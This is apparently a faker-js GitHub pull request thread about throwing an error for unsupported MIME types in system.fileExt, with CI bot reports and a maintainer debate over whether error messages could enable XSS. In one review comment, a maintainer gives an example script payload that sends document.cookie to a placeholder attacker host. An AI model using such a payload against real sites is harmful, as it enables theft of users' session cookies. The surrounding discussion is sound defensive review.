fix: validate unsupported fileExt mime types

[hiSandog]

Summary

• throw a FakerError when system.fileExt receives an unsupported MIME type
• add test coverage for unsupported MIME type input

Validation

• pnpm exec vitest run test/modules/system.spec.ts
• pnpm exec eslint src/modules/system/index.ts test/modules/system.spec.ts

[netlify]

✅ Deploy Preview for fakerjs ready!

Built without sensitive environment variables

Name	Link
🔨 Latest commit	1a9c873
🔍 Latest deploy log	https://app.netlify.com/projects/fakerjs/deploys/6a1e76604b4aa7000864ff63
😎 Deploy Preview	https://deploy-preview-3879.fakerjs.dev
📱 Preview on mobile	Toggle QR Code... Use your smartphone camera to open QR code link.
🤖 Make changes	Run an agent on this branch

---

To edit notification comments on pull requests, go to your Netlify project configuration.

[codecov]

Codecov Report

✅ All modified and coverable lines are covered by tests.
✅ Project coverage is 98.92%. Comparing base (5bd8709) to head (1a9c873).

Additional details and impacted files

@@           Coverage Diff           @@
##             next    #3879   +/-   ##
=======================================
  Coverage   98.92%   98.92%           
=======================================
  Files         908      908           
  Lines        3159     3162    +3     
  Branches      581      582    +1     
=======================================
+ Hits         3125     3128    +3     
  Misses         30       30           
  Partials        4        4           

Files with missing lines	Coverage Δ
src/modules/system/index.ts	100.00% <100.00%> (ø)

🚀 New features to boost your workflow:

• ❄️ Test Analytics: Detect flaky tests, report on failures, and find test suite problems.
• 📦 JS Bundle Analysis: Save yourself from yourself by tracking and limiting bundle sizes in JS merges.

[matthewmayer]

What was the old behavior?

[ST-DDT]

Old:

New:

Maybe put foo/the mime type in 'quotes'?

[matthewmayer]

is including user input in error messages a potential XSS vector?

like what if someone passes

faker.system.fileExt("<script>fetch('http://attacker.com/steal?cookie=' + document.cookie)</script>")

and then a website naively renders the error message in HTML causing the payload to execute.

[ST-DDT]

IMO not. Adding arbritary text as html is the issue. Not some code throwing an error message containing something that looks like a script.

[xDivisionByZerox]

Can this affect the API docs by any chance? We are inserting the return values of our functions as HTML into the DOM.

faker/docs/.vitepress/components/api-docs/refreshable-code.vue

Lines 101 to 107 in 5458620

	if (resultLines.length === 1) {
	domLine.insertAdjacentHTML('beforeend', newCommentSpan(resultLines[0]));
	} else {
	for (const line of resultLines.reverse()) {
	domLine.insertAdjacentHTML('afterend', newCommentLine(line));
	}
	}

[ST-DDT]

faker/scripts/shared/refreshable-code.ts

Line 31 in 5458620

`try { result.push($1); } catch (error: unknown) { result.push(error instanceof Error ? error.name : 'Error'); console.log('Error in example for ${name}:', error); }\n`

We add the error type not the error message. In addition to that we check our examples for malicious code anyway.

[xDivisionByZerox]

We add the error type not the error message.

I wasn't aware of it. That's why I was asking. Thanks for pointing that out.

In addition to that we check our examples for malicious code anyway.

I guess you refer to manual checks? Or in the refreshable code component? If the first thing is true, a malicious example might still be provided as a PR and automatically deployed to netlify. Sure, that is not the main Faker webpage, but still a page running under the faker domain.
But as you said, the error message does not get put into the DOM, so that shouldn't be a concern for now.

[ST-DDT]

I guess you refer to manual checks?

Yes

If the first thing is true, a malicious example might still be provided as a PR and automatically deployed to netlify.

The same is true for all PRs. A PR can disable or remove any security check we have. If that is a concern for you, maybe enable copilot reviews for all PRs.